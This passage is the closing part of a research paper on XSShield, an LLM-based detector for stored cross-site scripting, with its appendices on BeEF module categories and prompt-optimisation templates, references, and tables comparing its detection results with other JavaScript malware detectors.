Data curation, Y.Z. (Yuan Zhou) and W.Y.; Formal analysis, Y.Z. (Yuan Zhou), W.G., S.Y., Y.Z. (Yibo Zhang) and W.Q.; Investigation, Y.Z. (Yuan Zhou) and E.W.; Methodology, Y.Z. (Yuan Zhou) and W.X.; Resources, Y.Z. (Yuan Zhou); Software, Y.Z. (Yuan Zhou) and W.Y.; Supervision, E.W. and W.X.; Validation, Y.Z. (Yuan Zhou); Writing—original draft, Y.Z. (Yuan Zhou); Writing—review & editing, Y.Z. (Yuan Zhou) and E.W. All authors have read and agreed to the published version of the manuscript.

Funding

This research received no external funding.

Institutional Review Board Statement

Not applicable.

Informed Consent Statement

Not applicable.

Data Availability Statement

The original contributions presented in this study are included in the article. Further inquiries can be directed to the corresponding author.

Conflicts of Interest

The authors declare no conflicts of interest.

Abbreviations

    The following abbreviations are used in this manuscript:
XSS: Cross-Site Scripting
LLM: Large Language Model
PDG: Program Dependence Graph
AST: Abstract Syntax Tree
CFG: Control Flow Graph
MCC: Matthews Correlation Coefficient
CSP: Content Security Policy
UCB: Upper Confidence Bound Bandits
UCB-R: Upper Confidence Bound Bandits with Weighted Randomization

Appendix A. Attack Vector Classification

Information-Gathering Modules. These modules are designed to collect crucial data about the target environment, including browser fingerprints, host system details, and network configurations. Such information forms the foundation for subsequent targeted attacks and exploit customization.
Exploit Modules. This category focuses on leveraging known vulnerabilities in browsers, extensions, and systems to gain unauthorized access or execute arbitrary code. The integration with Metasploit enhances BeEF’s exploit capabilities, allowing for more sophisticated attack chains.
Mobile and Cross-Platform Modules. These modules target mobile applications developed using PhoneGap (Apache Cordova), addressing the growing importance of mobile security in the current digital landscape. They enable testing of hybrid mobile applications across different platforms.
Persistence and Social Engineering Modules. This category combines techniques for maintaining long-term access to compromised systems with methods for manipulating users into performing actions that may compromise security. These modules highlight the critical role of human factors in cybersecurity.
Auxiliary and Support Modules. These modules provide supplementary functionalities that aid in the development, testing, and customization of BeEF operations. They enhance the framework’s flexibility and support more complex attack scenarios.
Inter-Protocol Communication Modules. These modules focus on exploiting interactions between different protocols, enabling more sophisticated attack vectors that leverage the complexities of modern networked systems.

Appendix B. Prompt Template in Prompt Expander

In the Prompt Expander phase (using gradient descent method), the framework first uses initial prompts to guide the LLM in performing sequential predictions on the code in the training set (as shown in Figure A1a). By comparing prediction results with labels, the framework filters out code samples with discrepant predictions to form an error sample set. Subsequently, incorrectly predicted code examples are randomly extracted from the error sample set and combined with current prompts to serve as {{error_string}} in Figure A1b for generating error reasons. The framework then inputs these prompts and corresponding {{reasons}} into the framework shown in Figure A1c, guiding the LLM to generate improved new prompts based on these inputs. Finally, both the newly generated prompts and original prompts are input into the Prompt Selector phase.
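The sketch below summarizes this loop in code, under stated assumptions: llm() stands in for a single call to the base model, and the three template strings are abbreviated placeholders for the full templates in Figure A1; in the real framework, the expanded prompts are then passed to the Prompt Selector. It is an illustrative sketch rather than the paper’s implementation.

```python
# Hedged sketch of one Prompt Expander iteration (cf. Figure A1a-c).
# llm() is a placeholder callable for the base model; the template strings are
# abbreviated stand-ins for the full templates shown in Figure A1.
import random

EVAL_TEMPLATE = "{prompt}\n\nCode:\n{text}\nAnswer 'malicious' or 'benign':"                         # Figure A1a
GRADIENT_TEMPLATE = "Prompt:\n{prompt}\nMisclassified code:\n{error_string}\nExplain why the prompt failed:"  # Figure A1b
UPDATE_TEMPLATE = "Prompt:\n{prompt}\nFailure reason:\n{reason}\nWrite {number_of_new_prompts} improved prompts:"  # Figure A1c

def expand_prompt(llm, prompt, train_set, n_new=3):
    """train_set: list of (code, label) pairs with labels 'malicious'/'benign'."""
    # 1. Evaluate the current prompt and collect mispredicted samples (error sample set).
    errors = [code for code, label in train_set
              if llm(EVAL_TEMPLATE.format(prompt=prompt, text=code)).strip().lower() != label]
    if not errors:
        return [prompt]

    # 2. "Gradient" step: ask the LLM why the prompt failed on a randomly sampled error case.
    error_string = random.choice(errors)
    reason = llm(GRADIENT_TEMPLATE.format(prompt=prompt, error_string=error_string))

    # 3. Update step: generate improved prompts conditioned on the failure reason.
    new_prompts = llm(UPDATE_TEMPLATE.format(
        prompt=prompt, reason=reason, number_of_new_prompts=n_new))
    return [prompt] + [p.strip() for p in new_prompts.split("\n") if p.strip()]
```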
Figure A1. Prompt templates in Prompt Expander. (a) Template for prompt evaluation. For LLM predictions, insert prompts into {{prompt}} and code into {{text}}; the LLM’s output {{predict}} will be used directly as the prediction result. (b) Template for gradient generation. For identifying error reasons in LLMs’ input and output, {{prompt}} is the currently used prompt, {{error_string}} is the code where prediction results do not match the labels; the output {{reason}} explains why the current prompt predicted this code incorrectly. (c) Template for prompt updating. For updating prompts in LLMs’ input and output, {{prompt}} is the current prompt used for prediction, {{reason}} is the reason for prediction error, {{number_of_new_prompts}} is the number of new prompts that need to be generated from this prompt; the output {{new_prompts}} represents the newly generated prompts after improving the current prompt’s errors.

References

  1. OWASP Foundation. Cross-Site Scripting (XSS). 2021. Available online: https://owasp.org/www-community/attacks/xss/ (accessed on 3 December 2024).
  2. HackerOne. 8th Annual Hacker-Powered Security Report. 2024. Available online: https://hackerpoweredsecurityreport.com/ (accessed on 3 December 2024).
  3. CVE Project. cvelistV5. 2023. Available online: https://github.com/CVEProject/cvelistV5/ (accessed on 3 December 2024).
  4. National Vulnerability Database. CVE-2023-40000. 2023. Available online: https://nvd.nist.gov/vuln/detail/CVE-2023-40000/ (accessed on 3 December 2024).
  5. Bing, L.; Fengyu, Z. Study and Design of Stored-XSS Vulnerability Detection. Comput. Appl. Softw. 2013, 17–21. [Google Scholar]
  6. Somorovsky, J.; Heiderich, M.; Jensen, M.; Schwenk, J.; Gruschka, N.; Lo Iacono, L. All your clouds are belong to us: Security analysis of cloud management interfaces. In Proceedings of the 3rd ACM Workshop on Cloud Computing Security Workshop (CCSW ‘11), New York, NY, USA, 21 October 2011; pp. 3–14. [Google Scholar] [CrossRef]
  7. Gupta, S.; Gupta, B.B. Cross-Site Scripting (XSS) attacks and defense mechanisms: Classification and state-of-the-art. Int. J. Syst. Assur. Eng. Manag. 2017, 8, 512–530. [Google Scholar] [CrossRef]
  8. Barth, A.; Jackson, C.; Mitchell, J.C. Robust defenses for cross-site request forgery. In Proceedings of the 15th ACM Conference on Computer and Communications Security, Alexandria, VA, USA, 27–31 October 2008. [Google Scholar] [CrossRef]
  9. Heiderich, M.; Niemietz, M.; Schuster, F.; Holz, T.; Schwenk, J. Scriptless attacks: Stealing the pie without touching the sill. In Proceedings of the 2012 ACM Conference on Computer and Communications Security (CCS ‘12), New York, NY, USA, 16–18 October 2012; pp. 760–771. [Google Scholar] [CrossRef]
  10. Gupta, S.; Gupta, B.B. XSS-SAFE: A Server-Side Approach to Detect and Mitigate Cross-Site Scripting (XSS) Attacks in JavaScript Code. Arab. J. Sci. Eng. 2015, 41, 897–920. [Google Scholar] [CrossRef]
  11. Noever, D. Can Large Language Models Find and Fix Vulnerable Software? arXiv 2023, arXiv:2308.10345. [Google Scholar]
  12. Gupta, M.; Akiri, C.; Aryal, K.; Parker, E.; Praharaj, L. From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy. IEEE Access 2023, 11, 80218–80245. [Google Scholar] [CrossRef]
  13. Ganguli, D.; Lovitt, L.; Kernion, J.; Askell, A.; Bai, Y.; Kadavath, S.; Mann, B.; Perez, E.; Schiefer, N.; Ndousse, K.; et al. Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned. arXiv 2022, arXiv:2209.07858. [Google Scholar]
  14. Yang, W.; Dong, Y.; Li, X.; Zhang, D.; Wang, J.; Zhu, H.; Deng, Y. Security foundation of deep learning: Formalization, verification, and applications. ACM Comput. Surv. 2022, 55, 1–35. [Google Scholar] [CrossRef]
  15. Roth, S.; Gröber, L.; Backes, M.; Krombholz, K.; Stock, B. 12 Angry Developers—A Qualitative Study on Developers’ Struggles with CSP. In Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security (CCS ‘21), New York, NY, USA, 15–19 November 2021; pp. 3085–3103. [Google Scholar] [CrossRef]
  16. Xu, G.; Xie, X.; Huang, S.; Zhang, J.; Pan, L.; Lou, W.; Liang, K. JSCSP: A Novel Policy-Based XSS Defense Mechanism for Browsers. IEEE Trans. Dependable Secur. Comput. 2022, 19, 862–878. [Google Scholar] [CrossRef]
  17. Pan, X.; Cao, Y.; Liu, S.; Zhou, Y.; Chen, Y.; Zhou, T. CSPAutoGen: Black-box Enforcement of Content Security Policy upon Real-world Websites. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS ‘16), New York, NY, USA, 24–28 October 2016; pp. 653–665. [Google Scholar] [CrossRef]
  18. Alhindi, M.; Hallett, J. Sandboxing Adoption in Open Source Ecosystems. arXiv 2024, arXiv:2405.06447. [Google Scholar]
  19. Oren, Y.; Kemerlis, V.P.; Sethumadhavan, S.; Keromytis, A.D. The Spy in the Sandbox—Practical Cache Attacks in JavaScript. arXiv 2015, arXiv:1502.07373. [Google Scholar]
  20. Bisht, P.; Venkatakrishnan, V.N. XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks. In Detection of Intrusions and Malware, and Vulnerability Assessment; Zamboni, D., Ed.; Springer: Berlin/Heidelberg, Germany, 2008; pp. 23–43. [Google Scholar]
  21. Bates, D.; Barth, A.; Jackson, C. Regular expressions considered harmful in client-side XSS filters. In Proceedings of the 19th International Conference on World Wide Web (WWW ‘10), New York, NY, USA, 26–30 April 2010; pp. 91–100. [Google Scholar] [CrossRef]
  22. Pelizzi, R.; Sekar, R. Protection, usability and improvements in reflected XSS filters. In Proceedings of the 7th ACM Symposium on Information, Computer and Communications Security (ASIACCS ‘12), New York, NY, USA, 2–4 May 2012; p. 5. [Google Scholar] [CrossRef]
  23. Gupta, S.; Gupta, B.B. XSS-immune: A Google chrome extension-based XSS defensive framework for contemporary platforms of web applications. Sec. Commun. Netw. 2016, 9, 3966–3986. [Google Scholar] [CrossRef]
  24. Chaudhary, P.; Gupta, B.B.; Gupta, S. A Framework for Preserving the Privacy of Online Users Against XSS Worms on Online Social Network. Int. J. Inf. Technol. Web Eng. 2019, 14, 85–111. [Google Scholar] [CrossRef]
  25. Gupta, S.; Gupta, B.B.; Chaudhary, P. Hunting for DOM-Based XSS vulnerabilities in mobile cloud-based online social network. Future Gener. Comput. Syst. 2018, 79, 319–336. [Google Scholar] [CrossRef]
  26. Lalia, S.; Sarah, A. XSS Attack Detection Approach Based on Scripts Features Analysis. In Trends and Advances in Information Systems and Technologies; Rocha, Á., Adeli, H., Reis, L.P., Costanzo, S., Eds.; Springer: Cham, Switzerland, 2018; pp. 197–207. [Google Scholar]
  27. Gupta, S.; Gupta, B.B. XSS-secure as a service for the platforms of online social network-based multimedia web applications in cloud. Multimed. Tools Appl. 2018, 17, 4829–4861. [Google Scholar] [CrossRef]
  28. Aurore54F. static-pdg-js; Licensed Under AGPL-3.0. 2024. Available online: https://github.com/Aurore54F/static-pdg-js (accessed on 3 December 2024).
  29. Blondel, V.D.; Guillaume, J.L.; Lambiotte, R.; Lefebvre, E. Fast unfolding of communities in large networks. J. Stat. Mech. Theory Exp. 2008, 2008, P10008. [Google Scholar] [CrossRef]
  30. Microsoft. LMOps; Licensed Under MIT. 2024. Available online: https://github.com/microsoft/LMOps (accessed on 3 December 2024).
  31. beefproject. beef. 2024. Available online: https://github.com/beefproject/beef (accessed on 10 March 2025).
  32. JavaScript-obfuscator. 2024. Available online: https://github.com/JavaScript-obfuscator/JavaScript-obfuscator (accessed on 10 March 2025).
  33. Raychev, V.; Bielik, P.; Vechev, M.; Krause, A. Learning programs from noisy data. ACM SIGPLAN Not. 2016, 51, 761–774. [Google Scholar] [CrossRef]
  34. VirusTotal. 2024. Available online: https://www.virustotal.com/gui/home/upload (accessed on 10 March 2025).
  35. HynekPetrak. JavaScript Malware Collection. 2024. Available online: https://github.com/HynekPetrak/JavaScript-malware-collection (accessed on 10 March 2025).
  36. geeksonsecurity. Malicious JavaScript Dataset. 2017. Available online: https://github.com/geeksonsecurity/js-malicious-dataset (accessed on 10 March 2025).
  37. Romano, A.; Lehmann, D.; Pradel, M.; Wang, W. Wobfuscator: Obfuscating JavaScript Malware via Opportunistic Translation to WebAssembly. In Proceedings of the 2022 IEEE Symposium on Security and Privacy (SP), San Francisco, CA, USA, 22–26 May 2022; pp. 1574–1589. [Google Scholar] [CrossRef]
  38. Rieck, K.; Krueger, T.; Dewald, A. CUJO: Efficient detection and prevention of drive-by-download attacks. In Proceedings of the 26th Annual Computer Security Applications Conference, Austin, TX, USA, 6–10 December 2010; pp. 31–39. [Google Scholar]
  39. Aurore54F. lexical-jsdetector. 2024. Available online: https://github.com/Aurore54F/lexical-jsdetector (accessed on 10 March 2025).
  40. Curtsinger, C.; Livshits, B.; Zorn, B.; Seifert, C. ZOZZLE: Fast and Precise In-Browser JavaScript Malware Detection. In Proceedings of the USENIX Security Symposium, USENIX Security Symposium, San Francisco, CA, USA, 10–12 August 2011. [Google Scholar]
  41. Aurore54F. syntactic-jsdetector. 2024. Available online: https://github.com/Aurore54F/syntactic-jsdetector (accessed on 10 March 2025).
  42. Fass, A.; Backes, M.; Stock, B. JStap: A Static Pre-Filter for Malicious JavaScript Detection. In Proceedings of the 35th Annual Computer Security Applications Conference, San Juan, Puerto Rico, 9–13 December 2019; pp. 257–269. [Google Scholar]
  43. Aurore54F. JStap. 2024. Available online: https://github.com/Aurore54F/JStap (accessed on 10 March 2025).
  44. Dehghantanha, A.; Yazdinejad, A.; Parizi, R.M. Autonomous Cybersecurity: Evolving Challenges, Emerging Opportunities, and Future Research Trajectories. In Proceedings of the Workshop on Autonomous Cybersecurity (AutonomousCyber ‘24), New York, NY, USA, 14–18 October 2024; pp. 1–10. [Google Scholar] [CrossRef]
  45. Yazdinejad, A.; Dehghantanha, A.; Karimipour, H.; Srivastava, G.; Parizi, R.M. A Robust Privacy-Preserving Federated Learning Model Against Model Poisoning Attacks. IEEE Trans. Inf. Forensics Secur. 2024, 19, 6693–6708. [Google Scholar] [CrossRef]
  46. Jim, T.; Swamy, N.; Hicks, M. Defeating script injection attacks with browser-enforced embedded policies. In Proceedings of the 16th International Conference on World Wide Web (WWW ‘07), New York, NY, USA, 8–12 May 2007; pp. 601–610. [Google Scholar] [CrossRef]
  47. Gundy, M.V.; Chen, H. Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks. In Proceedings of the Network and Distributed System Security Symposium, San Diego, CA, USA, 8–11 February 2009. [Google Scholar]
  48. Stock, B.; Lekies, S.; Mueller, T.; Spiegel, P.; Johns, M. Precise client-side protection against DOM-based cross-site scripting. In Proceedings of the 23rd USENIX Conference on Security Symposium (SEC’14), Anaheim, CA, USA, 9–11 August 2014; pp. 655–670. [Google Scholar]
  49. Samuel, M.; Saxena, P.; Song, D. Context-sensitive auto-sanitization in web templating languages using type qualifiers. In Proceedings of the 18th ACM Conference on Computer and Communications Security, New York, NY, USA, 17–21 October 2011; pp. 587–600. [Google Scholar] [CrossRef]
  50. Weinberger, J.; Saxena, P.; Akhawe, D.; Finifter, M.; Shin, R.; Song, D. A Systematic Analysis of XSS Sanitization in Web Application Frameworks. In Computer Security—ESORICS 2011; Atluri, V., Diaz, C., Eds.; Springer: Berlin/Heidelberg, Germany, 2011; pp. 150–171. [Google Scholar]
  51. Melicher, W.; Das, A.; Sharif, M.; Bauer, L.; Jia, L. Riding out DOMsday: Towards Detecting and Preventing DOM Cross-Site Scripting. In Proceedings of the Network and Distributed System Security Symposium, San Diego, CA, USA, 18–21 February 2018. [Google Scholar]
  52. West, M.; Barth, A.; Veditz, D. Content Security Policy Level 2. 2016. Available online: https://www.w3.org/TR/CSP2/ (accessed on 9 March 2025).
  53. Agten, P.; Acker, S.V.; Brondsema, Y.; Phung, P.H.; Desmet, L.; Piessens, F. JSand: Complete client-side sandboxing of third-party JavaScript without browser modifications. In Proceedings of the Asia-Pacific Computer Systems Architecture Conference, Matsue, Japan, 28–31 August 2012. [Google Scholar]
  54. Kolbitsch, C.; Livshits, B.; Zorn, B.; Seifert, C. Rozzle: De-cloaking Internet Malware. In Proceedings of the 2012 IEEE Symposium on Security and Privacy, San Francisco, CA, USA, 20–23 May 2012; pp. 443–457. [Google Scholar] [CrossRef]
  55. Fass, A.; Krawczyk, R.P.; Backes, M.; Stock, B. JaSt: Fully Syntactic Detection of Malicious (Obfuscated) JavaScript. In Detection of Intrusions and Malware, and Vulnerability Assessment; Giuffrida, C., Bardin, S., Blanc, G., Eds.; Springer: Cham, Switzerland, 2018; pp. 303–325. [Google Scholar]
  56. Wang, Y.; Cai, W.d.; Wei, P.c. A deep learning approach for detecting malicious JavaScript code. Sec. Commun. Netw. 2016, 9, 1520–1534. [Google Scholar] [CrossRef]
  57. Ndichu, S.; Kim, S.; Ozawa, S.; Misu, T.; Makishima, K. A machine learning approach to detection of JavaScript-based attacks using AST features and paragraph vectors. Appl. Soft Comput. 2019, 84, 105721. [Google Scholar] [CrossRef]
  58. Shin, T.; Razeghi, Y.; Logan, R.L., IV; Wallace, E.; Singh, S. AutoPrompt: Eliciting Knowledge from Language Models with Automatically Generated Prompts. arXiv 2020, arXiv:2010.15980. [Google Scholar]
  59. Gao, T.; Fisch, A.; Chen, D. Making Pre-trained Language Models Better Few-shot Learners. arXiv 2021, arXiv:2012.15723. [Google Scholar]
  60. Schick, T.; Schütze, H. Exploiting Cloze Questions for Few Shot Text Classification and Natural Language Inference. arXiv 2021, arXiv:2001.07676. [Google Scholar]
  61. Li, X.L.; Liang, P. Prefix-Tuning: Optimizing Continuous Prompts for Generation. arXiv 2021, arXiv:2101.00190. [Google Scholar]
  62. Brown, T.B.; Mann, B.; Ryder, N.; Subbiah, M.; Kaplan, J.; Dhariwal, P.; Neelakantan, A.; Shyam, P.; Sastry, G.; Askell, A.; et al. Language Models are Few-Shot Learners. arXiv 2020, arXiv:2005.14165. [Google Scholar]
  63. Wu, G.; Wu, W.; Liu, X.; Xu, K.; Wan, T.; Wang, W. Cheap-Fake Detection with LLM Using Prompt Engineering. In Proceedings of the 2023 IEEE International Conference on Multimedia and Expo Workshops (ICMEW), Brisbane, Australia, 10–14 July 2023; pp. 105–109. [Google Scholar] [CrossRef]
  64. Wang, E.; Chen, J.; Xie, W.; Wang, C.; Gao, Y.; Wang, Z.; Duan, H.; Liu, Y.; Wang, B. Where URLs Become Weapons: Automated Discovery of SSRF Vulnerabilities in Web Applications. In Proceedings of the 2024 IEEE Symposium on Security and Privacy (SP), San Francisco, CA, USA, 19–23 May 2024; pp. 239–257. [Google Scholar] [CrossRef]
Figure 1. Comparison of detection mechanisms between reflected XSS and stored XSS attacks. The left diagram illustrates how in reflected XSS attack scenarios, the differential analysis successfully detects malicious payload within the request–response traffic and issues a “ban” signal to prevent the attack from completing. The right diagram demonstrates how in stored XSS attack scenarios, the differential analysis becomes ineffective and issues a “pass” signal, allowing the attack to complete, since the attack payload only appears in the response but not in the request traffic. In the stored XSS case (right), when the victim user accesses the compromised page through normal request (3), the attack payload embedded in the server’s database is delivered in the response without any corresponding malicious content in the current request. This request–response mismatch prevents the detection system from establishing the causal relationship required for triggering the “ban” signal. Orange solid lines indicate traffic containing attack payloads, black solid lines represent normal traffic, and blue dashed lines denote control signals.
Figure 2. The architecture of XSShield for defending against stored XSS attacks. The system operates in two phases: (1) Training Phase (blue arrows): The Prompt Optimizer implements a three-stage optimization process as described in Section 3.1, including prompt expansion (identifies label-prediction mismatch samples through base model evaluation, analyzes error root causes via LLM-based reasoning on these adversarial cases, and generates enhanced prompts by combining diagnostic insights with original prompt templates) and prompt selection. (2) Operational Phase (yellow arrows): The Data Adaptor processes target JavaScript code through the pipeline detailed in Section 3.2, consisting of a PDG Generator, a PDG Partitioner, and a Code Representation Generator. The trained system achieves efficient detection by combining optimized prompts with the base model to classify incoming code representations as either benign or malicious, as described in Section 3.3’s LLM-based detector implementation.
Figure 3. Comparison of F1-scores between UCB and UCB-R selection algorithms across 12 rounds of evaluation on the validation set. The solid lines show the best-performing prompts per round, while the shaded areas represent the performance distribution of candidate prompts. Compared to the stable and gradual convergence of UCB (blue), UCB-R (orange) achieves superior peak performance after round 6, benefiting from its weighted random sampling strategy.
Table 1. Dataset composition for evaluation.
| | Development Set | Evaluation Set |
| Malicious | HynekPetrak/JavaScript-malware-collection; geeksonsecurity/js-malicious-dataset; VirusTotal | BeEF Implement |
| Benign | JS150k (excluding low-redundancy samples) | 305 low-redundancy JS files |
Table 2. Performance comparison of XSShield and other detectors on evaluation sets.
| Module Category | Type | XSShield | Cujo | Zozzle | JStap (Pdgngrams) | JStap (Pdgvalues) | JStap (Astngram) | JStap (Astvalue) |
| BeEF: Information Gathering | non-obf | 72.90% (78/107) | 0% (0/107) | 1.87% (2/107) | 0% (0/107) | 0% (0/107) | 0% (0/107) | 0% (0/107) |
| | obf | 59.81% (64/107) | 0% (0/107) | 72.90% (78/107) | 9.35% (10/107) | 0% (0/107) | 9.35% (10/107) | 0% (0/107) |
| | sum | 66.36% (142/214) | 0% (0/214) | 37.38% (80/214) | 4.67% (10/214) | 0% (0/214) | 4.67% (10/214) | 0% (0/214) |
| BeEF: Exploit | non-obf | 92.92% (105/113) | 0% (0/113) | 0% (0/113) | 0% (0/113) | 0% (0/113) | 0% (0/113) | 0% (0/113) |
| | obf | 69.03% (78/113) | 0% (0/113) | 97.35% (110/113) | 3.54% (4/113) | 0% (0/113) | 7.96% (9/113) | 0% (0/113) |
| | sum | 80.97% (183/226) | 0% (0/226) | 48.67% (110/226) | 1.77% (4/226) | 0% (0/226) | 3.98% (9/226) | 0% (0/226) |
| BeEF: Mobile and Cross-Platform | non-obf | 81.25% (13/16) | 0% (0/16) | 0% (0/16) | 0% (0/16) | 0% (0/16) | 0% (0/16) | 0% (0/16) |
| | obf | 56.25% (9/16) | 0% (0/16) | 75% (12/16) | 0% (0/16) | 0% (0/16) | 6.25% (1/16) | 0% (0/16) |
| | sum | 68.75% (22/32) | 0% (0/32) | 37.5% (12/32) | 0% (0/32) | 0% (0/32) | 3.13% (1/32) | 0% (0/32) |
| BeEF: Persistence and Social Engineering | non-obf | 93.75% (30/32) | 0% (0/32) | 0% (0/32) | 0% (0/32) | 0% (0/32) | 0% (0/32) | 0% (0/32) |
| | obf | 71.88% (23/32) | 0% (0/32) | 87.5% (28/32) | 3.13% (1/32) | 0% (0/32) | 9.38% (3/32) | 0% (0/32) |
| | sum | 82.81% (53/64) | 0% (0/64) | 43.75% (28/64) | 1.56% (1/64) | 0% (0/64) | 4.69% (3/64) | 0% (0/64) |
| BeEF: Auxiliary and Support | non-obf | 82.14% (23/28) | 0% (0/28) | 0% (0/28) | 0% (0/28) | 0% (0/28) | 0% (0/28) | 0% (0/28) |
| | obf | 64.29% (18/28) | 0% (0/28) | 78.57% (22/28) | 10.71% (3/28) | 3.57% (1/28) | 10.71% (3/28) | 3.57% (1/28) |
| | sum | 73.21% (41/56) | 0% (0/56) | 39.29% (22/56) | 5.36% (3/56) | 1.79% (1/56) | 5.36% (3/56) | 1.79% (1/56) |
| BeEF: Inter-Protocol Communication | non-obf | 88.89% (8/9) | 0% (0/9) | 0% (0/9) | 0% (0/9) | 0% (0/9) | 0% (0/9) | 0% (0/9) |
| | obf | 66.67% (6/9) | 0% (0/9) | 100% (9/9) | 0% (0/9) | 0% (0/9) | 0% (0/9) | 0% (0/9) |
| | sum | 77.78% (14/18) | 0% (0/18) | 50% (9/18) | 0% (0/18) | 0% (0/18) | 0% (0/18) | 0% (0/18) |
| BeEF Summary | non-obf | 84.26% (257/305) | 0% (0/305) | 0.66% (2/305) | 0% (0/305) | 0% (0/305) | 0% (0/305) | 0% (0/305) |
| | obf | 64.92% (198/305) | 0% (0/305) | 84.92% (259/305) | 5.90% (18/305) | 0.33% (1/305) | 8.52% (26/305) | 0.33% (1/305) |
| | sum | 74.59% (455/610) | 0% (0/610) | 42.79% (261/610) | 2.95% (18/610) | 0.16% (1/610) | 4.26% (26/610) | 0.16% (1/610) |
| Benign | non-obf | 97.05% (296/305) | 100% (305/305) | 95.41% (291/305) | 100% (305/305) | 99.67% (304/305) | 100% (305/305) | 99.67% (304/305) |
| | obf | 80.00% (244/305) | 100% (305/305) | 0% (0/305) | 77.38% (236/305) | 97.05% (296/305) | 82.62% (252/305) | 97.70% (298/305) |
| | sum | 88.52% (540/610) | 100% (610/610) | 47.70% (291/610) | 88.69% (541/610) | 98.36% (600/610) | 91.31% (557/610) | 98.69% (602/610) |
| Summary | non-obf | 90.66% (553/610) | 50% (305/610) | 48.03% (293/610) | 50% (305/610) | 49.84% (304/610) | 50% (305/610) | 49.84% (304/610) |
| | obf | 72.46% (442/610) | 50% (305/610) | 42.46% (259/610) | 41.64% (254/610) | 48.69% (297/610) | 45.57% (278/610) | 49.02% (299/610) |
| | sum | 81.56% (995/1220) | 50% (610/1220) | 45.25% (552/1220) | 45.82% (559/1220) | 49.26% (601/1220) | 47.79% (583/1220) | 49.43% (603/1220) |
| MCC | non-obf | 0.8137 | 0 | −0.0811 | 0 | −0.0393 | 0 | −0.0393 |
| | obf | 0.5973 | 0 | −0.1741 | −0.1900 | −0.0380 | −0.1008 | −0.0261 |
| | sum | 0.7055 | 0 | −0.0165 | −0.0950 | −0.0387 | −0.0504 | −0.0327 |
| F1 | non-obf | 0.8991 | 0 | 0.0125 | 0 | 0 | 0 | 0 |
| | obf | 0.7018 | 0 | 0.5983 | 0.0915 | 0.0063 | 0.1354 | 0.0064 |
| | sum | 0.8005 | 0 | 0.4394 | 0.0517 | 0.0032 | 0.0754 | 0.0032 |
Table 3. Detection accuracy of other detectors on test sets.
| Class | Cujo | Zozzle | JStap (Pdgngrams) | JStap (Pdgvalues) | JStap (Astngram) | JStap (Astvalue) |
| Benign | 0.99 (39,731/39,731 + 18) | 39,153/39,153 + 143 | 34,816/34,816 | 34,760/34,760 + 2 | 38,676/38,676 + 1 | 38,687/38,687 + 2 |
| Malicious | 0.85 (4455/4455 + 769) | 0.82 (3839/3839 + 833) | 4462/4462 + 96 | 4417/4417 + 141 | 4585/4585 + 84 | 4541/4541 + 128 |
Table 4. Component-wise detection accuracy analysis of XSShield on evaluation sets.
| Selector | Class | Non-Adaptor Correct/Total | Non-Adaptor Accuracy | Adaptor Correct/Total | Adaptor Accuracy |
| Non-selector | Malicious | 132/305 | 58.36% | 231/305 | 73.11% |
| | Benign | 224/305 | | 215/305 | |
| UCB | Malicious | 163/305 | 59.67% | 224/305 | 77.87% |
| | Benign | 201/305 | | 251/305 | |
| UCB-R | Malicious | 208/305 | 71.97% | 257/305 | 86.07% |
| | Benign | 231/305 | | 296/305 | |
Table 5. Performance comparison of different evaluation models within XSShield.
| | GPT-3.5-Turbo | GPT-4 | Gemini-Pro |
| Malicious | 257/305 | 272/305 | 52/305 |
| Benign | 296/305 | 295/305 | 170/305 |
| F1-score | 0.9001 | 0.9266 | 0.2112 |
Table 6. The efficiency of detectors on evaluation sets (seconds; Δ denotes model-communication overhead).
| Category | Type | XSShield | JaSt | Lex | Syn | JStap (Pdgngrams) | JStap (Pdgvalues) | JStap (Astngram) | JStap (Astvalue) |
| BeEF | non-obf | 5.63 + Δ | 18.31 | 4.22 | 8.05 | 4.81 | 5.34 | 4.73 | 4.90 |
| | obf | 13.79 + Δ | 22.62 | 3.93 | 9.94 | 9.45 | 15.75 | 8.46 | 10.68 |
| Benign | non-obf | 34.93 + Δ | 46.94 | 6.74 | 19.77 | 29.12 | 58.52 | 26.99 | 35.05 |
| | obf | 195.64 + Δ | 78.33 | 9.65 | 44.17 | 135.28 | 276.18 | 115.29 | 151.87 |
| Avg. per file | | 0.205 + Δ | 0.136 | 0.020 | 0.067 | 0.146 | 0.292 | 0.127 | 0.191 |
